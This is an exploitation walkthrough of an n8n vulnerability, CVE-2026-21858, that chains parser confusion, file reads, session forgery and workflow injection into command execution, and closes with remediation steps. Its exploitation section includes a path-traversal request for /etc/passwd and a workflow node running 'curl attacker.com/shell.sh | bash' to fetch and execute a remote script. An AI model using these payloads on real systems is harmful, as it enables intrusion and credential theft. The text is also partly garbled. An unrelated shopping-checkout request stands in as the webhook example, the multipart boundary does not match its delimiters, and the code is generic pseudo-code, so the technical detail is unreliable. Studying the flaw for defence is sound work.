Ni8mare: Unauthenticated Remote Code Execution in n8n

An in-depth exploitation walkthrough of CVE-2026-21858 involving parser confusion, arbitrary file reads, session forgery, workflow injection, and remote code execution.

Root Cause Analysis

This vulnerability is not a generic remote code execution issue.

It is the result of a compound flaw involving:

• content-type confusion
• unsafe workflow execution
• improper request parsing
• implicit trust boundaries

Vulnerability Class

• Content-Type confusion
• Improper request parsing
• Unsafe file handling
• Arbitrary file read
• Workflow injection
• Command injection
• Remote Code Execution

The issue originates from how n8n processes webhook requests and conditionally parses input based on the Content-Type header.

In practice:

• The webhook handler branches logic based on Content-Type
• Attackers can manipulate headers and payload structure
• Malicious input is treated as trusted workflow data

Exploit Chain

Stage 1 — Entry Point (Unauthenticated Webhook)

n8n exposes webhook endpoints of the form:

POST /webhook/<id>

POST /api/v1/checkout HTTP/2
Host: www.target.com

{
  "saltedhash": "hashcode",
  "product_id": "121212",
  "price": "10",
  "quantity": "10",
  "address": "ABC city",
  "zipcode": "123456"
}

These endpoints are often:

• Publicly accessible
• Unauthenticated
• Directly mapped to workflow execution

This forms the initial attack surface and primary input vector.

Stage 2 — Content-Type Confusion

Intended Behavior

if (req.headers['content-type'] === 'multipart/form-data') {
    parseMultipart(req);
} else {
    parseJson(req);
}

Vulnerability

The implementation relies on weak validation of the Content-Type header.

An attacker can:

• Supply malformed multipart/form-data
• Mismatch the header and body format
• Manipulate parser selection

This results in:

• Incorrect parser execution
• Misinterpretation of attacker-controlled input
• Data being treated as trusted file uploads or workflow data

Stage 3 — Arbitrary File Read

Due to parsing inconsistencies, attacker-controlled fields propagate into file handling logic.

// vulnerable pseudo-code
const filePath = req.body.file;
const content = fs.readFileSync(filePath);

Impact includes access to sensitive files such as:

• /etc/passwd
• .env
• application secrets
• configuration files

This establishes a reliable information disclosure primitive.

Stage 4 — Credential Extraction and Session Forgery

Sensitive information obtained via file reads may include:

• API tokens
• Database credentials
• Session secrets
• Internal application keys

These can be leveraged to forge authenticated sessions.

// example session forgery
const session = sign({ role: "admin" }, SECRET);

This converts the file read primitive into an authentication bypass.

Stage 5 — Workflow Injection

n8n workflows are executable node definitions.

Example:

{
  "nodes": [
    {
      "type": "executeCommand",
      "parameters": {
        "command": "whoami"
      }
    }
  ]
}

If the attacker gains the ability to:

• Create workflows
• Modify workflows
• Trigger workflows

they effectively gain execution control.

Stage 6 — Command Execution Sink

function executeNode(node) {

    if (node.type === "executeCommand") {

        const cmd = node.parameters.command;

        return child_process.exec(cmd);

    }

}

Characteristics of this sink:

• No sanitization
• No sandboxing
• Direct system command execution
• User-controlled execution flow

This results in full remote code execution.

End-to-End Attack Flow

[1] Unauthenticated webhook request
        ↓
[2] Content-Type confusion
        ↓
[3] Arbitrary file read
        ↓
[4] Credential extraction
        ↓
[5] Session forgery
        ↓
[6] Workflow injection
        ↓
[7] Workflow execution
        ↓
[8] Remote Code Execution

Exploitation Example

Step 1 — Malicious Request

POST /webhook/test HTTP/1.1
Content-Type: multipart/form-data; boundary=-XYZ

XYZ
Content-Disposition: form-data; name="file"

../../../../etc/passwd
XYZ--

This leverages parser confusion to trigger arbitrary file access.

Step 2 — Workflow Injection

{
  "nodes": [
    {
      "type": "executeCommand",
      "parameters": {
        "command": "curl attacker.com/shell.sh | bash"
      }
    }
  ]
}

Step 3 — Execution Trigger

POST /workflow/run

At this point arbitrary command execution is achieved.

Remediation Guidance

1. Strict Content-Type Enforcement

if (!req.is('multipart/form-data')) {
    throw new Error("Invalid content type");
}

2. Input and Path Validation

if (!isSafePath(userInput)) {
    throw new Error("Invalid path");
}

3. Eliminate Dangerous Execution Primitives

// unsafe
exec(userInput);

4. Isolate Workflow Execution

• Enforce sandboxed execution
• Remove direct OS command execution
• Implement strict node allowlists
• Restrict workflow privileges
• Apply execution isolation

Security Implications

This vulnerability demonstrates a recurring design failure in modern web applications:

• Treating user input as executable logic
• Overprivileged automation systems
• Implicit trust assumptions
• Unsafe execution sinks
• Weak parser trust boundaries

Conclusion

CVE-2026-21858 is a multi-stage exploit chain combining:

• parsing ambiguity
• arbitrary file access
• credential disclosure
• session forgery
• workflow injection
• command execution

The issue is not a single isolated bug, but the interaction between multiple insecure trust boundaries.

This attack pattern is broadly applicable to:

• workflow engines
• automation systems
• low-code platforms
• orchestration frameworks

Identifying similar vulnerabilities requires tracing:

• external input
• parser behavior
• trust propagation
• execution sinks

with particular focus on:

• implicit trust assumptions
• unsafe execution models
• user-controlled workflow logic